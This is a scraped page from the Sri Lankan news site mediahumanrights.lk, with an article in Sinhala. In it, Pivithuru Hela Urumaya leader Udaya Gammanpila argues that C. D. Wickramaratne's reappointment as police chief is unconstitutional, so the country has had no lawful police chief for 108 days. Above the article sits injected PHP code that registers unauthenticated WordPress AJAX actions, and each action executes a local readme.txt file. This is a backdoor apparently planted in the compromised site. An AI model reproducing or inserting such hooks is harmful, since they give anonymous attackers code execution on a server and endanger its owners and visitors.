if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } සී ඩී පොලිස්පති ධූරයට පත් කිරීම නීති විරෝධියි… - mediahumanrights.lk
mediahumanrights.lk
Local News News

සී ඩී පොලිස්පති ධූරයට පත් කිරීම නීති විරෝධියි…

මාර්තු 26 සිට අද දක්වා දින 108ක් රට තුල පොලිස්පතිවරයෙකු නොමැති බව පිවිතුරු හෙළ උරුමයේ නායක නීතිඥ උදය ගම්මන්පිල මහතා පවසයි.

සී ඩී වික්‍රමරත්න මහතා පොලිස්පති ධූරයට යළි පත් කිරීම නීති විරෝදී වීම මීට හේතුව බව ද ඒ මහතා වැඩි දුරටත් සදහන් කර සිටී.

පිවිතුරු හෙළ උරුමයේ නායකයා මේ බව සදහන් කර සිටියේ පිවිතුරු හෙළ උරුමය පක්ෂ මූලස්ථානයේ පැවති මාධ්‍ය හමුවක් අමතමිනි. එහිදී පිවිතුරු හෙළ උරුමයේ නායකයා වැඩි දුරටත් මෙසේ අදහස් දැක්වීය.

ජනාධිපති සහ මහජන ආරක්ෂාව පිළිබඳ ඇමති එකඟතාවයෙන් සී ඩී වික්‍රමරත්න මහතා පොලිස්පති ධූරයට යළි පත් කිරීමට තීරණය කළ බව මාධ්‍ය වාර්තා කළා. නමුත් ඒ පත්වීම දෙයාකාරයකින් නීති විරෝධියි.

ආණ්ඩුක්‍රම ව්‍යවස්ථාවේ 41ඇ(1) වගන්තිය අනුව ව්‍යවස්ථාදායක සභාව විසින් අනුමත කර ඇත්නම් මිස මේ ව්‍යවස්ථාවේ උපලේඛණයේ නිශ්චිතව දක්වා ඇති කිසිම ධූරයකට ජනාධිපතිවරයා විසින් කිසිදු තැනැත්තෙකු පත් කරනු නොලැබිය යුත්තේය. දින 14කට වැඩි කාලයක් වැඩ බැලීමට පත් කරන අයෙකුටත් මේ වගන්තිය අදාළ බව (2) උපවගන්තියෙන් කියනවා. මේ කියන උපලේඛණයේ හතරවන තනතුර ලෙස දක්වා ඇත්තේ පොලිස්පති තනතුර.

මාර්තු මාසයේ 28දා ජනාධිපතිවරයා සී ඩී වික්‍රමරත්න මහතාව මාස තුනකට පොලිස්පති තනතුරට පත් කලේ ව්‍යවස්ථාදායක සභාවේ අනුමැතියක් නැතිව. අනුමැතිය ලබා ගත්තේ අප්‍රේල් 1දා. නමුත් ව්‍යවස්ථාදායක සභාවේ අනුමැතිය ලබා ගැනීමට පෙර ජනාධිපතිවරයාට පොලිස්පතිවරයා පත් කළ නොහැකි බව ව්‍යවස්ථාවේ 41 වගන්තියෙන් ඉතාම පැහැදිලියි. මෙවරත් ජනාධිපතිතුමා තවත් මාස තුනකට වික්‍රරත්න මහතා පොලිස්පති තනතුරට පත් කරන්නේ ව්‍යවස්ථාදායක සභාවේ අනුමැතියකින් තොරවයි. කරත්තයට ඉදිරියෙන් හරකා ගැට ගහණව මිසක් හරකට ඉදිරියෙන් කරත්තය ගැට ගහන සිරිතක් නෑ. ඒ නිසා ඒ පත්වීම නීතිය ඉදිරියේ ශූන්‍යයි. ඒ කියන්නේ අදටත් මේ රටේ පොලිස්පතිවරයෙකු නෑ.

රාජ්‍ය සහ අධිකරණ නිලධාරි (විශ්‍රාම) ආඥා පනත යටතේ සෑදු රීති අනුව විශ්‍රාම වයස අවුරුදු 60ක් වුවත් යම් නිලධාරියෙකුගේ සේවය එම ආයතනයේ අභිවෘද්ධිය සඳහා අවශ්‍ය යැයි අදාළ බලධාරියා සලකන්නේ නම් සේවා දිගුවක් ලබා දිය හැකියි. සේවා දිගුවක් ලබා දිය හැක්කේ සේවයේ සිටින අයෙකුට පමණයි.

නමුත් වික්‍රමරත්න මහතා මාර්තු 26දා විශ්‍රාම ගියා. විශ්‍රාම ගිය අයෙකුට සේවා දිගුවක් ලබා දෙන්න බෑ. ඒ නිසා තමයි ජනාධිපතිතුමා විසින් මාර්තු 28 දා නව පත්වීමක් ලෙස වික්‍රමරත්න මහතා පොලිස්පති තනතුරට යලි පත් කරන්නේ. නමුත් වයස අවුරුදු 60 විශ්‍රාම ගිය අයෙකු නැවත පත් කරන්න කිසිම නීතිමය ප්‍රතිපාදනයක් නෑ. ඒ නිසා වික්‍රමරත්න මහතාට ලබා දුන් පත්වීම නීතිය ඉදිරියේ ශූන්‍යයයි. මාර්තු 26 සිට අද දක්වා දින 108ක් රට දුවන්නේ පොලිස්පතිවරයෙකු නැතිවයි. ඉන්න කෙනා නීති විරෝධියි. නීති විරෝධිව තනතුරක් දරණ කෙනෙක් තමන්ගේ ප්‍රධානියා හැටියට තබා ගෙන පොලිස් නිලධාරින් අන් අයට නීතිය ක්‍රියාත්මක කරන්නේ කොහොමද?

– Media unit

Related posts

ජනතාව පෝලිමේ සිටීම ගැන අපට සමාවෙන්න.. ඉක්මනටම පෝලිම් නැති කරනවා..

Shiran Viraj

රෝහිත පෙම්වතියගෙන් කනේ පහරක් කයි – නාමලුත් ගැටුමට මැදිහත් වෙයි – ඡායාරූප අන්තර්ජාලයට

Shiran Viraj

කෑමට නුසුදුසු දේ දුන් ආයතන 2716ට නඩු

Shiran Viraj